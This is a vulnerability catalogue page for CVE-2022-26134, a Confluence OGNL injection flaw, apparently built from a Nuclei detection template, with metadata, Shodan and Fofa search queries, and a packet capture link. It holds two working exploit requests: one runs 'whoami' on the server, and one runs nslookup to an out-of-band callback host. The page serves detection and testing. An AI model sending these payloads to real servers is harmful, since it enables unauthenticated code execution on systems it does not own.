🔙 목록으로 돌아가기

CVE-2022-26134: Confluence - Remote Code Execution

TitleConfluence - Remote Code Execution
Authorpdteam,jbertman
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationApply the latest security patches or updates provided by Atlassian to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94408
CVE IDCVE-2022-26134
CWE IDCWE-917
Shodan Queryhttp.component:"Atlassian Confluence"http.component:"atlassian confluence"
Fofa Queryapp="atlassian-confluence"
Tags cve cve2022 packetstorm confluence rce ognl oast kev atlassian vkev vuln

🔍 Vulnerability Description

Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.

🌐 HTTP Request

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d5jma6hle0o3ni5podvgoepe73tjf5yox.oast.fun%22%29%7D/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-26134.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-26134.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A